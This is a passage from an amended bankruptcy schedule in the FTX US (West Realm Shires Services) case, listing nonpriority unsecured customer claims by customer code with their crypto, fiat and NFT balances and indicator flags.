| 07432033 | | CUSDT[1], SHIB[50.69150121], TRX[10.62096043], USD[0.00], USDT[0] | Yes | |
| 07432035 | | USD[5000.00] | | |
| 07432038 | | BTC[0.00009906], ETH[0], ETHW[0.00005000], LINK[0], MATIC[0], USD[0.00], USDT[0], YFI[0] | | |
| 07432039 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07432052 | | ETHW[0], USD[0.00], USDT[0] | | |
| 07432065 | | ETH[1.19075208], ETHW[1.19075208], GRT[12], LINK[572.71813053], LTC[2.05873753], USD[0.01] | | |
| 07432082 | | BTC[0], DOGE[0], LINK[0], USD[0.00], USDT[0] | | |
| 07432085 | | CUSDT[1], GRT[24.03756361], SHIB[1], USD[0.00] | | |
| 07432088 | | USDT[0] | | |
| 07432089 | | ETHW[7.02], USD[3.91], USDT[0] | | |
| 07432090 | | LINK[1.79581017], USD[0.00] | | |
| 07432098 | | BTC[0], CUSDT[1], SOL[.00041584], TRX[2], USD[0.00] | Yes | |
| 07432104 | | DOGE[1], USD[27344.20] | Yes | |
| 07432106 | | BCH[0], BTC[0.00000034], DOGE[1], ETH[0], LTC[0], SOL[0], TRX[1], USD[0.00], USDT[1.06079918] | Yes | |
| 07432109 | | USD[0.00] | | |
| 07432115 | | BTC[0], DOGE[0], ETH[0], NFT (390694236294245147/FTX - Off The Grid Miami #630)[1], NFT (488559871194771352/Australia Ticket Stub #918)[1], SHIB[17304564.25573122], USD[0.00] | | |
| 07432117 | | USD[0.00] | | |
| 07432119 | | BTC[0.00005568], DOGE[1], SOL[-0.00000001], USD[0.00] | Yes | |
| 07432125 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07432136 | | BF_POINT[300] | | |
| 07432138 | | AAVE[.23529135], AVAX[1.37454352], BRZ[90.08079437], BTC[.00238311], CUSDT[22], DOGE[1056.12738574], ETH[.52095969], ETHW[4.65141824], GRT[195.10335248], KSHIB[949.87473052], MATIC[60.93464113], SHIB[1918583.73745274], SOL[52.58182413], SUSHI[24.57215948], TRX[441.12413202], UNI[19.4914529], USD[5.00] | Yes | |
| 07432141 | | DOGE[4.01004787], USD[0.00] | | |
| 07432144 | | SUSHI[1], TRX[.000003], UNI[1], USD[0.09], USDT[1.00128000] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07432151 | | USD[0.00], USDT[0.00000057] | | |
| 07432163 | | CUSDT[1], LINK[0], SOL[0.00010375], USD[0.04] | Yes | |
| 07432166 | | BTC[0], DOGE[0], MKR[0], SOL[0], USD[48.16], USDT[0] | | |
| 07432169 | | CUSDT[1], DOGE[114367.60819457], TRX[227.76757000], USD[0.00], USDT[0] | | |
| 07432171 | | CUSDT[5], DOGE[0], TRX[2], USD[0.00], USDT[1] | | |
| 07432175 | | ETH[.00050994], ETHW[.00050994], USD[0.26], USDT[0] | | |
| 07432180 | | ETH[.00000001], ETHW[0], SOL[0], USD[0.00] | | |
| 07432181 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07432191 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07432202 | | BTC[0], LTC[0], USD[157.58], USDT[0.00000001] | | |
| 07432206 | | ETH[.00000001], USD[0.00] | | |
| 07432220 | | USD[0.00], USDT[0] | | |
| 07432222 | | USD[30.00] | | |
| 07432232 | | USD[0.00] | | |
| 07432238 | | USD[0.13] | | |
| 07432243 | | ETH[0], LINK[.09939], SOL[.00000001], USD[0.81] | | |
| 07432257 | | BAT[1], BTC[0], TRX[1], YF[0] | | |
| 07432261 | | BRZ[3], DOGE[3], GRT[1], NFT (425814112107006296/Entrance Voucher #1122)[1], SHIB[5], TRX[72.9714203], USD[0.00], USDT[0.00000001] | Yes | |
| 07432263 | | BTC[0.00000193], ETH[0], ETHW[0], NFT (525590936354257624/Entrance Voucher #2001)[1], SOL[0], TRX[0], USD[0.05] | | |
| 07432265 | | BRZ[1], DOGE[583.28942298], USD[0.00] | | |
| 07432267 | | SOL[0] | | |
| 07432268 | | BAT[2], BRZ[2], CUSDT[12], DOGE[3], USD[0.01] | | |
| 07432270 | | USD[0.00] | | |
| 07432273 | | USD[1.39] | | |
| 07432274 | | BTC[0.00031025], USDT[0.18548710] | | |
| 07432282 | Contingent, Disputed | ETH[0], NFT (294630395388435451/Barcelona Ticket Stub #92)[1], NFT (435755481823282510/Bahrain Ticket Stub #973)[1], NFT (547852862364692086/FTX Crypto Cup 2022 Key #1460)[1], SOL[.0046], TRX[.000007], USD[0.78] | Yes | |
| 07432283 | | USD[0.00], USDT[0.00000036] | | |
| 07432287 | | USD[2.05] | | |
| 07432289 | | DOGE[626.92379552], SHIB[779.94583164], USD[0.00] | | |
| 07432290 | Contingent, Disputed | USD[0.00] | | |
| 07432294 | | BTC[.0000192], USD[1.97], USDT[.38703968] | | |
| 07432297 | | BAT[665.76900157], BRZ[1], BTC[.00192283], CUSDT[29], DOGE[0], ETH[.00000001], SHIB[2816987.27590866], TRX[9.01851208], USD[0.00] | Yes | |
| 07432301 | | CUSDT[7], DOGE[7.1033451], NFT (317697554420574047/Astral Apes #2303)[1], NFT (376309276207087734/Astral Apes #3124)[1], NFT (423195618713622491/Astral Apes #2788)[1], NFT (544254985855765546/Astral Apes #789)[1], SHIB[2], SOL[4.31300127], TRX[1], USD[449.73], USDT[1.00042013] | Yes | |
| 07432302 | | AAVE[0], BRZ[2], CUSDT[23], DOGE[2], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[0.01] | | |
| 07432308 | | DOGE[912.56312185], USD[0.60] | | |
| 07432320 | | BTC[.00090382], USD[0.00] | | |
| 07432326 | | CUSDT[1], USD[0.01] | | |
| 07432335 | | TRX[779.651224] | | |
| 07432337 | | USD[0.00] | | |
| 07432339 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07432340 | | ETH[.041], ETHW[.041], SOL[.0016], USD[4.52] | | |
| 07432345 | | SOL[0] | | |
| 07432347 | | BTC[0], DOGE[0], TRX[0], USD[0.00], USDT[0.00048850] | | |
| 07432349 | | USD[0.00], USDT[0.00000004] | | |
| 07432355 | | DOGE[2034.909], SUSHI[.47], USD[0.20] | | |
| 07432365 | | USDT[0.00021873] | | |
| 07432372 | | NFT (505439544113252955/Miami HEAT: Classic Home - 22/50)[1], USD[150.00] | | |
| 07432387 | | BTC[0.00005717], ETH[.00048222], ETHW[.00048222], USD[-0.11], USDT[1.4138562] | | |
| 07432392 | | BAT[3.01808419], BRZ[5], CUSDT[30], ETH[.000018], ETHW[.000018], GRT[.00204413], TRX[25.355781], USD[0.00], USDT[2.01205602] | | |
| 07432395 | | USD[0.01] | Yes | |
| 07432396 | | BTC[.009] | | |
| 07432397 | | BTC[.00006335], USD[0.01], WBTC[.00009212] | | |
| 07432406 | | CUSDT[4], TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07432411 | | USD[0.26] | | |
| 07432420 | | BTC[0], USD[0.87] | | |
| 07432423 | | LINK[0], SOL[0], TRX[2], USD[0.00], USDT[0.00000019] | Yes | |
| 07432425 | | BCH[0], DOGE[0], ETH[0.02961789], ETHW[0.02924853], LTC[0], SHIB[18179.62014953], TRX[0], USD[0.00] | Yes | |
| 07432426 | | BTC[.00066106], DOGE[929.45622026], SHIB[2420940.85298737], SOL[24.51844603], USD[742.12] | Yes | |

West Realm Shires Services Inc.

Case 22-11068-JTD Doc 1752 Filed 06/27/23 Page 1290 of 1316
Amended Schedule F-52 Nonpriority Unsecured Claims - Customer Claims

22-11071 (JTD)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07432427 | | CUSDT[1], DOGE[130.20631339], USD[0.00] | | |
| 07432430 | | BTC[.00008099], TRX[1], USD[295.79] | | |
| 07432432 | | USD[0.00], USDT[0.00000052] | Yes | |
| 07432445 | | DOGE[2], USD[0.00] | | |
| 07432451 | | ETH[.00070134], ETHW[.00070134], USDT[.7102592] | | |
| 07432454 | | BTC[.008991], ETH[.538461], ETHW[.538461], USD[1.57] | | |
| 07432456 | | CUSDT[35.09437339], DOGE[3], GRT[1.00352207], SOL[.00749791], TRX[4], USD[0.82] | Yes | |
| 07432462 | | BTC[.00008405], USD[0.00] | | |
| 07432466 | | USD[0.01], USDT[0] | | |
| 07432474 | | DOGE[1086.46781892], TRX[1104.9777717], USD[0.00] | Yes | |
| 07432478 | | TRX[6.00573842] | Yes | |
| 07432482 | | BRZ[1], CUSDT[5], TRX[70.24089219], USD[0.01] | | |
| 07432483 | | BRZ[.0088], BTC[0], CUSDT[0.35497962], GRT[0], PAXG[0], TRX[0.30563424], USD[0.00], USDT[0] | | CUSDT[.304238] |
| 07432484 | | DOGE[1], USD[0.00] | | |
| 07432485 | | BRZ[1], BTC[.01943406], CUSDT[3], DOGE[5], ETH[.1828507], ETHW[.18261022], NEAR[12.87886929], SHIB[3], SOL[3.75435272], TRX[.01370357], USD[0.00] | Yes | |
| 07432493 | | BAT[0], DOGE[0], ETH[0], LTC[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.02142494] | Yes | |
| 07432507 | | SOL[0], USDT[0.00000005] | | |
| 07432511 | | BTC[0], ETH[0], USD[0.00] | | |
| 07432521 | | USDT[1.130309] | | |
| 07432524 | | AAVE[0], DOGE[5.976], ETH[0], LINK[0], MKR[0], SOL[0], SUSHI[0], TRX[0], USD[0.14], USDT[0.00000015] | | |
| 07432527 | | BAT[1], DOGE[2], USD[0.00] | | |
| 07432530 | | USD[0.00] | | |
| 07432545 | | ETH[.00000001], SOL[0] | | |
| 07432549 | | CUSDT[1], DOGE[1], TRX[1539.0676001], USD[0.01] | | |
| 07432550 | | BAT[4], BRZ[1], CUSDT[8], DOGE[0], ETH[0], GRT[5], SOL[1], SUSHI[1], TRX[6], USD[0.00], USDT[0] | | |
| 07432555 | | BRZ[1], TRX[3596.57893411], USD[0.00] | | |
| 07432561 | | BTC[.0003225], CUSDT[9], DOGE[7.8577412], ETH[.0032046], ETHW[.00316356], GRT[29.61841248], MATIC[42.90537146], SHIB[578057.26057299], TRX[1], USD[0.00] | Yes | |
| 07432569 | | ETHW[1.05908936], NFT [339693767394922234/SharkBro #7006][1], NFT [340433145624418752/Doge Capital #4098][1], NFT [357604725394905604/Golden bone pass][1], NFT [570405575628920611/Sigma Shark #5405][1], SHIB[5741067.23119723], SUSHI[6.45145055], USD[4066.86] | Yes | |
| 07432582 | | DOGE[1], SOL[31.78110842], TRX[1], USD[0.00] | Yes | |
| 07432588 | | TRX[.000132], USD[0.00], USDT[0.00004812] | | |
| 07432589 | | USD[0.00] | | |
| 07432592 | | DOGE[1], USD[0.00] | | |
| 07432594 | | AAVE[0], BAT[0], BCH[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0.00000255], ETHW[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], MKR[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07432600 | | DOGE[1000], USD[78.15] | | |
| 07432601 | | BTC[.04068527] | | |
| 07432603 | | CUSDT[2], USD[0.01], USDT[2.12518351] | Yes | |
| 07432604 | | USD[1.34], USDT[0] | | |
| 07432609 | | DOGE[.69990234], TRX[.10133794], USD[0.00] | | |
| 07432618 | | BAT[2.08026928], BRZ[2], CUSDT[1], DOGE[7.00057537], ETH[.00004737], ETHW[5.21282232], GRT[2.00087713], SHIB[2], USD[0.01] | Yes | |
| 07432620 | | BTC[.00670874], DOGE[.00121612], ETH[.00000063], ETHW[.00000513], SHIB[5.24805006], USD[188.00], USDT[0] | Yes | |
| 07432633 | | USD[0.00] | | |
| 07432639 | | AAVE[0.33389838], BRZ[3.98628066], CUSDT[9.0010604], DOGE[142.24627609], ETH[0], KSHIB[152.36632521], LTC[0], NFT [314766516062036251/Pixel pearl #3][1], SHIB[246291.61480834], TRX[1], USD[0.02] | Yes | |
| 07432645 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07432649 | | BTC[0], SHIB[1], USD[0.00] | Yes | |
| 07432653 | | BTC[0], USD[0.00] | | |
| 07432657 | | BTC[.00002705] | | |
| 07432661 | | SOL[20.9746], TRX[1248.75], USD[7.70] | | |
| 07432682 | | AAVE[.03973857], BAT[1113.18533806], BRZ[3], BTC[.10622666], CUSDT[9], DOGE[41.53499662], ETH[2.09351511], ETHW[2.09288146], GRT[11.87042583], KSHIB[171.38078067], LINK[564.68622476], LTC[57.39524169], MATIC[5.55474991], SHIB[150178.21304621], SOL[327.36253961], SUSHI[1.27929738], TRX[110.60317232], UNI[.42399627], USD[15822.68], USDT[11.56561919], YFI[.00050593] | Yes | |
| 07432690 | | BRZ[1], DOGE[5], SHIB[8], TRX[1], USD[0.01] | Yes | |
| 07432691 | | BTC[.00552082], CUSDT[3], DOGE[1], ETH[.04541871], ETHW[.04541871], USD[0.00] | | |
| 07432693 | | CUSDT[4], TRX[9.89707347], USD[0.19] | | |
| 07432699 | | BTC[.00862663], CUSDT[7], DOGE[1019.08901444], ETH[.11248796], ETHW[.11248796], GRT[11.05296647], LINK[11.20887228], LTC[14.01347059], SHIB[717905.27723214], SOL[5.05995682], SUSHI[11.39255613], TRX[108.40823233], UNI[8.17810108], USD[0.01] | | |
| 07432702 | | BRZ[1], BTC[.01663063], CUSDT[6], DOGE[13.52380547], ETH[.13739236], ETHW[.13739236], SOL[1], TRX[1], USD[0.01], USDT[0] | | |
| 07432707 | | BTC[.10418159], CUSDT[1], GRT[1], TRX[2], USD[1179.26] | | |
| 07432710 | | BRZ[3], CUSDT[12], ETH[0], SHIB[1], TRX[3], USD[0.00] | | |
| 07432713 | | BCH[0], BTC[0], DOGE[0], TRX[0], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07432715 | | CUSDT[4], TRX[3], USD[0.00] | | |
| 07432718 | | TRX[.000001], USDT[3587.369391] | | |
| 07432721 | | CUSDT[1], LINK[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07432723 | | USD[4.65] | | |
| 07432725 | | DOGE[4.0221248], USD[0.00], USDT[0] | Yes | |
| 07432731 | | LTC[.0023698] | | |
| 07432738 | | BRZ[1], CUSDT[1], DOGE[11.83609627], TRX[135.51330882], USD[0.00] | | |
| 07432743 | | DOGE[0], GRT[0], SUSHI[0], TRX[12.95490669], USD[0.05] | | |
| 07432751 | | USD[1.43] | | |
| 07432752 | | BRZ[2], CUSDT[4], GRT[1.00498957], USD[0.00] | Yes | |
| 07432757 | | BTC[0], USD[0.00], USDT[.0061992] | | |
| 07432772 | | BF_POINT[500], BTC[.00001065], DOGE[2], SHIB[1], SOL[6.96930484], TRX[2], UNI[.0001274], USD[22005.53] | Yes | |
| 07432773 | | BTC[.00006527], CUSDT[4], DOGE[1], GRT[2], TRX[2], USD[0.00] | | |
| 07432775 | | BTC[0], DAI[0], ETH[0], ETHW[0.00040200], USD[0.00], USDT[0] | | |
| 07432778 | | BRZ[1], TRX[1], USD[0.01] | Yes | |
| 07432782 | | TRX[.000047], USD[0.00], USDT[0] | | |
| 07432788 | | BRZ[140.88825055], BTC[.00047582], DOGE[968.21164957], ETH[.18696818], ETHW[.18696818], SOL[1.85103862], USD[0.00], USDT[24.87509988], YFI[.00081452] | | |
| 07432791 | | BCH[.01420523], BRZ[1], BTC[.00422478], CUSDT[26], DOGE[24], ETH[.04381865], LTC[.3562371], PAXG[.01773712], SOL[1.44931685], TRX[480.90235729], UNI[1.33889756], USD[-136.00], YFI[.00202263] | | |
| 07432797 | | CUSDT[10], NFT [310700414086827886/LightPunk #1671][1], TRX[1], USD[0.00] | Yes | |
| 07432804 | | CUSDT[3], DOGE[1], SOL[1.58379191], TRX[878.39300761], USD[0.00] | Yes | |
| 07432806 | Contingent, Disputed | BTC[.04788239], USD[0.00], USDT[0] | | |
| 07432812 | | TRX[.000002], USDT[.12] | | |
| 07432814 | | USD[0.00] | | |
| 07432816 | Contingent, Disputed | USD[0.00] | | |
| 07432818 | | BTC[.00643649], TRX[1], USD[107.55] | | |
| 07432831 | | CUSDT[1], DOGE[3.00120496], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07432834 | | TRX[.000002], USD[0.00], USDT[0] | | |
| 07432835 | | BTC[.00011761] | | |
| 07432837 | | CUSDT[2], USD[0.05], USDT[.00392738] | Yes | |
| 07432842 | | ETH[.00000001], SOL[0] | | |
| 07432854 | | USD[4.82] | | |
| 07432860 | | CUSDT[1], TRX[7489.85882252], USD[1108.18] | Yes | |
| 07432867 | | NFT [298459365004838696/France Ticket Stub #49][1], NFT [301597726360220647/Hungary Ticket Stub #207][1], NFT [326086170224208921/Entrance Voucher #1805][1], NFT [415735875907290238/FTX Crypto Cup 2022 Key #133][1], NFT [472445851267861856/Montreal Ticket Stub #158][1], USD[0.00], USDT[.00000913] | Yes | |
| 07432869 | | CAD[1.18], USD[0.00] | | |
| 07432870 | | NFT [488779665066711997/Coachella x FTX Weekend 1 #26257][1] | | |
| 07432874 | | USD[0.00] | | |
| 07432881 | | BRZ[1], DOGE[2], SHIB[1], TRX[1.000001], USD[0.00] | Yes | |
| 07432886 | | BAT[0], BTC[0], DOGE[0], ETH[0.00000547], ETHW[0.00000547], SOL[0], USD[0.00] | Yes | |
| 07432887 | | USD[4686.84] | | |
| 07432912 | | EUR[0.00], SHIB[1], USD[0.00] | Yes | |
| 07432919 | | CUSDT[2], USD[0.00], USDT[.00073385] | | |
| 07432933 | | USD[0.89] | | |
| 07432937 | | USD[0.00] | | |
| 07432938 | | CUSDT[1], ETH[.00000001], ETHW[0], LINK[0], SOL[0] | Yes | |
| 07432951 | | CUSDT[2], DOGE[90.95599112], ETH[.01027959], ETHW[.01027959], LINK[1.18380544], TRX[1], USD[0.00] | | |
| 07432952 | | BTC[0], USD[0.16], WBTC[0] | | |
| 07432954 | | CUSDT[3], DOGE[1.00002494], USD[0.00] | | |
| 07432959 | | CUSDT[2], DOGE[2], ETHW[.01853496], SHIB[2], USD[69.09] | | |
| 07432971 | | ETH[.169], ETHW[.169], USD[0.54] | | |
| 07432972 | | BRZ[1], CUSDT[4], DOGE[3], SOL[2.99397115], USD[0.00] | | |
| 07432985 | | BRZ[164.91506846], BTC[.00017638], CUSDT[3], DOGE[36.08739729], GRT[3.00455687], LINK[.13232315], TRX[186.05773478], USD[0.00], YFI[.00022117] | | |
| 07432988 | | BRZ[1], CUSDT[8], DOGE[1], ETHW[.07094956], SHIB[1], TRX[2], USD[0.01] | | |
| 07432990 | | BAT[0], CUSDT[13], DOGE[0], ETH[0.03119024], ETHW[0.03119024], GRT[89.56592654], SUSHI[0], TRX[0], USD[0.00] | | |
| 07432993 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SHIB[4], USD[0.01], USDT[0] | | |
| 07432997 | | ALGO[0], LINK[.00665119], MATIC[0.06171268], USD[0.00] | | |
| 07433001 | | BTC[0], CUSDT[3], DOGE[91.79767577], TRX[2], USD[6.53] | Yes | |
| 07433011 | | CUSDT[1], USD[0.00] | | |
| 07433019 | | ETHW[.37563992], SOL[0], USD[4859.93], USDT[0.00000022] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07433022 | | USD[12.44] | | |
| 07433023 | | ETH[0], SOL[300.43883479], USD[0.00] | | |
| 07433028 | | ETHW[.00057106], USD[0.00] | | |
| 07433038 | | CUSDT[1], DOGE[13346.61658544], TRX[1], USD[0.01] | Yes | |
| 07433043 | | TRX[.716471], USD[0.11] | | |
| 07433044 | | BTC[0], DOGE[0], ETH[0] | | |
| 07433051 | | BRZ[2], BTC[.0918591], DOGE[6.56821908], ETH[.07268862], ETHW[.07268862], LINK[8.9047517], SHIB[10], SOL[1.75239059], TRX[2], USD[0.00] | | |
| 07433052 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07433054 | | BTC[.0000444], ETH[.000362], ETHW[.000362], LINK[.0909], SOL[3.56], SUSHI[.221], USD[0.56] | | |
| 07433063 | | BTC[0], DAI[0], DOGE[0], GRT[0.00009801], LINK[0], UNI[0], USD[0.00] | Yes | |
| 07433069 | | BCH[0], BTC[0.00258930], CUSDT[2], DOGE[2], ETH[0], TRX[1] | Yes | |
| 07433071 | | CUSDT[1], USDT[0] | | |
| 07433073 | | CUSDT[3], SUSHI[0], USD[0.00] | | |
| 07433080 | | BAT[1], USD[0.00] | | |
| 07433085 | | USDT[14.955] | | |
| 07433091 | Contingent, Disputed | USD[0.00] | | |
| 07433092 | | USD[0.00], USDT[0] | | |
| 07433095 | | AAVE[.19353119], AUD[47.63], BAT[166.01975587], BCH[.13528027], BRZ[313.89775674], BTC[.00098185], CUSDT[1161.1090452], DAI[124.37130651], DOGE[251.12292007], ETH[.02947003], ETHW[.02915539], EUR[49.28], GBP[25.74], GRT[121.15227342], LINK[3.26419311], LTC[.53626839], MATIC[105.59346554], MKR[.02378488], NFT [288368457364457283/Bahrain Ticket Stub #1114][1], NFT [314685511018100332/Hall of Fantasy League #117][1], NFT [350601727964784399/Hall of Fantasy League #130][1], NFT [371835921395934887/Hall of Fantasy League #128][1], NFT [380785543875420216/Hall of Fantasy League #132][1], NFT [388298458652485175/Hall of Fantasy League #150][1], NFT [392141908534728674/Hall of Fantasy League #118][1], NFT [392934781689252305/Hall of Fantasy League #142][1], NFT [406560821089568278/Hall of Fantasy League #127][1], NFT [443278766552743642/Hall of Fantasy League #120][1], NFT [467876394055777653/Hall of Fantasy League #119][1], NFT [523712780765988978/Hall of Fantasy League #151][1], NFT [533634301861519749/Hall of Fantasy League #143][1], NFT [552065437917944948/Hall of Fantasy League #136][1], NFT [576348130744909763/Hall of Fantasy League #140][1], PAXG[.02518828], SGD[29.36], SHIB[609528.19004601], SOL[1.3446313], SUSHI[14.44557899], TRX[1047.97195808], UNI[4.28494872], USDT[10.99338842], YFI[.00172721] | Yes | |
| 07433104 | | ETH[.0007238], ETHW[.0007238], USD[.01792], USD[0.00] | | |
| 07433109 | | ETH[.000888], ETHW[.000888], USD[15.09], USDT[.27947284] | | |
| 07433113 | | USD[0.18], USDT[0] | | |
| 07433116 | | DOGE[2], SUSHI[7.39684493], TRX[1], UNI[6.03683328], USD[0.00] | Yes | |
| 07433120 | | CUSDT[7], DOGE[4.05213569], NFT [457054246240188561/Imola Ticket Stub #2233][1], SOL[38.99704972], TRX[1], USD[10.55] | Yes | |
| 07433124 | | NFT [307295499037580945/Herald's Blood][1] | | |
| 07433133 | | BAT[5.56557615], BRZ[31.12126628], CUSDT[3], DOGE[295.28209116], SOL[.19091612], TRX[100.29981694], USD[5.49], USD[5.50200915] | Yes | |
| 07433140 | | AVAX[0], BTC[0], ETH[0], ETHW[4.03650854], LTC[0], SOL[0], USD[0.01], USDT[0] | | |
| 07433143 | | USD[355520.46], USDT[0] | | |
| 07433153 | | BTC[0], DOGE[.372], ETH[.000561], ETHW[.000561], SOL[7.556], SUSHI[.386], UNI[.046], USD[0.01], USDT[1.3277265] | | |
| 07433178 | | BTC[0], LTC[.0002], USD[5.76], USDT[4.97253366] | | |
| 07433179 | | BRZ[1], ETHW[3.46482863], SHIB[2], TRX[2], USD[5005.48] | Yes | |
| 07433180 | | BTC[.00067773], ETH[.001992], ETHW[.001992], USD[1.59] | | |
| 07433181 | | SOL[1.7928], USD[2.22] | | |
| 07433186 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07433190 | | BRZ[1], CUSDT[7], DOGE[2], NEAR[.02823591], NFT [290382941395826181/C. Alien #11][1], NFT [323510071036097604/Hero][1], NFT [370871673212064254/Hero #4][1], NFT [392791639956854652/Pop Art #40][1], NFT [408541058492249356/Parallel Scene #18][1], NFT [573352008654437487/Hero #2][1], SHIB[5], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07433196 | | DOGE[2], TRX[2632.96709837], USD[0.00] | | |
| 07433197 | | CUSDT[4], USD[0.01] | | |
| 07433204 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07433205 | | BRZ[1], DOGE[1], SOL[.00177176], USD[0.80] | | |
| 07433207 | | USD[0.00], USDT[0] | Yes | |
| 07433209 | | BAT[1], BRZ[4], CUSDT[6.00004713], DOGE[8162.51894009], GRT[643.12633968], LINK[817.33454823], TRX[6932.16534892], USD[0.00], USDT[4.00000001] | | |
| 07433221 | | CUSDT[2.0000032], DOGE[1259.08830538], KSHIB[22.35662543], SHIB[553981.71791986], USD[0.01], USDT[0.00003493] | Yes | |
| 07433223 | | CUSDT[4], USD[0.01] | | |
| 07433227 | | BRZ[1], CUSDT[10], GRT[1.00498957], TRX[2], USD[0.01] | Yes | |
| 07433230 | | BCH[.06596264], BRZ[1], BTC[.00332801], CUSDT[2], DOGE[124.78056336], ETH[.08093102], ETHW[.07993289], USD[0.00] | Yes | |
| 07433233 | | BCH[.0596427], BTC[0.00137216], LINK[3.44585], LTC[.335535], SOL[2.6008635], SUSHI[25.944425], TRX[717.11065], USDT[0.00002256], YFI[.0029848] | | |
| 07433237 | | BTC[.00046839], CUSDT[4], USD[0.00] | Yes | |
| 07433238 | | USD[0.00] | Yes | |
| 07433242 | | BAT[.00000001], BRZ[1], BTC[.00048973], CUSDT[11.00000002], DOGE[2.00002937], ETH[.00098524], ETHW[.07898524], GRT[.00000001], SHIB[19522.2884699], SOL[.00000015], SUSHI[.00000001], TRX[3.00000004], USD[224.31], USDT[0] | | |
| 07433247 | | BAT[2], BRZ[3], BTC[.00255978], CUSDT[9], DOGE[1], ETH[.00254834], ETHW[.00254834], GRT[35.55032305], LINK[.42996214], LTC[.16963413], TRX[1], USD[0.00] | | |
| 07433248 | | CUSDT[9], DOGE[3], SUSHI[0], USD[0.01] | | |
| 07433253 | | USD[17.81] | | |
| 07433254 | | BTC[.00019077] | | |
| 07433257 | | CUSDT[.0000165], DOGE[4], TRX[.00001464], USD[0.47], USDT[18.90318544] | | |
| 07433261 | | BRZ[.00000464], CUSDT[4], DOGE[1.00257311], GRT[.00151716], TRX[1], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07433262 | | CUSDT[6], DOGE[0], ETH[0], LTC[0], SOL[0], USD[0.01] | Yes | |
| 07433265 | | BAT[1], CUSDT[4], DOGE[25621.70287998], GRT[1], TRX[2], USD[0.00], USDT[2] | | |
| 07433276 | | AAVE[.50302591], DOGE[1], USD[0.00] | | |
| 07433277 | | BRZ[5.07952967], BTC[0.00000006], CUSDT[19], DOGE[2], SHIB[320070.27495689], TRX[4], USD[0.01] | Yes | |
| 07433278 | | BRZ[2], BTC[.00038285], CUSDT[2], ETH[.0237455], ETHW[.0237455], TRX[1], USD[0.00] | | |
| 07433281 | | BRZ[156.60082675], CUSDT[939.11940809], USD[0.94] | | |
| 07433283 | | CUSDT[7], DOGE[1421.31589579], TRX[.00002695], USD[0.00] | | |
| 07433284 | | BRZ[.52555199], CUSDT[9], LTC[.01691497], SHIB[473210.68176435], TRX[42.68988418], USD[0.01] | Yes | |
| 07433286 | | CUSDT[2], DOGE[4552.29378386], GRT[1.00498957], TRX[694.28080028], USD[0.00] | Yes | |
| 07433287 | | AAVE[.00000928], BRZ[4], BTC[.00016872], CUSDT[101.51457976], DOGE[7], ETH[.00000177], ETHW[.19394234], LINK[.00012125], LTC[.00000966], MATIC[.00247607], SHIB[11], SOL[.00004889], SUSHI[.00009009], TRX[10], UNI[.00008464], USD[970.56], USDT[0.00000001] | Yes | |
| 07433288 | | CUSDT[10], DOGE[303.36652976], SUSHI[2.36123986], TRX[2], USD[27.19] | Yes | |
| 07433289 | | SOL[0], USDT[0] | | |
| 07433290 | | BRZ[2], CUSDT[14], DOGE[.009653], LTC[.50739029], PAXG[.06095661], SHIB[11372416.5076862], TRX[1], USD[0.01], USDT[11.0295939] | Yes | |
| 07433293 | | USD[10.00] | | |
| 07433296 | | USD[160000.00] | | |
| 07433298 | | DOGE[304.23344191], MATIC[179.18438294], SHIB[3582179.03465284], USD[200.99] | Yes | |
| 07433302 | | BAT[1], CUSDT[2], DOGE[.50888789], USD[0.00] | | |
| 07433304 | | BAT[0], BCH[0], BTC[0], CUSDT[2], DAI[0], DOGE[1], ETH[0.00000001], ETHW[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.00], USDT[0] | | |
| 07433305 | | TRX[2], USD[0.00] | Yes | |
| 07433309 | | SOL[.09097354] | Yes | |
| 07433314 | | TRX[82.73118816], USD[0.00] | | |
| 07433315 | | SHIB[649277.54220431], USD[0.00] | Yes | |
| 07433316 | | BRZ[83.11711473], BTC[.00267496], CUSDT[89.75371493], DOGE[3208.30453159], ETH[.02484213], ETHW[.02453228], SHIB[690836.06425711], SOL[5.81957867], TRX[13.43501185], USD[0.00], USDT[1.11043116] | Yes | |
| 07433321 | | CUSDT[3], DOGE[75.77056729], TRX[317.06468453], USD[0.00] | | |
| 07433322 | | BAT[1], BRZ[4], CUSDT[2], TRX[2], USD[0.49] | | |
| 07433324 | | BTC[.00000003], NFT (424576294267412903/Girls Night )[1], USD[0.00] | Yes | |
| 07433327 | | CUSDT[3], DOGE[110.82351567], TRX[151.66829052], USD[0.00] | | |
